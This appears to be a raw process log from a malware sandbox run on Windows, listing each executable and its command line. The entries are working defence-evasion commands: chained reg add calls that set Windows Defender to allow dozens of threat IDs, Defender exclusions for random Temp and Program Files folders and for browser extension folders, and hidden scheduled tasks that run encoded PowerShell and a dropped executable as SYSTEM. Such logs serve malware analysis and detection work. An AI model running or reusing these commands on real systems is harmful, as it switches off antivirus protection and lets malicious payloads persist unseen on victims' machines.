"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JipyTrDkU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JipyTrDkU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YLgKyOFzWxOqC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YLgKyOFzWxOqC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\krdeMCnRKomDOvwVunR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\krdeMCnRKomDOvwVunR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nFLFFjqrQPUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nFLFFjqrQPUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tegRANPZONsU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tegRANPZONsU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fcblnlcRRSrBhAVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fcblnlcRRSrBhAVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZmzskowerwXEonlG\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZmzskowerwXEonlG\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fcblnlcRRSrBhAVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fcblnlcRRSrBhAVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZmzskowerwXEonlG /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZmzskowerwXEonlG /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gQWzPuxoy" /SC once /ST 02:30:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gQWzPuxoy"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gQWzPuxoy"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "WKALCIrwIEiqhKBsn" /SC once /ST 02:35:40 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe\" y7 /nJlrdidrp 385118 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "WKALCIrwIEiqhKBsn"
C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe
C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe y7 /nJlrdidrp 385118 /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2456 -ip 2456
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 1356
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
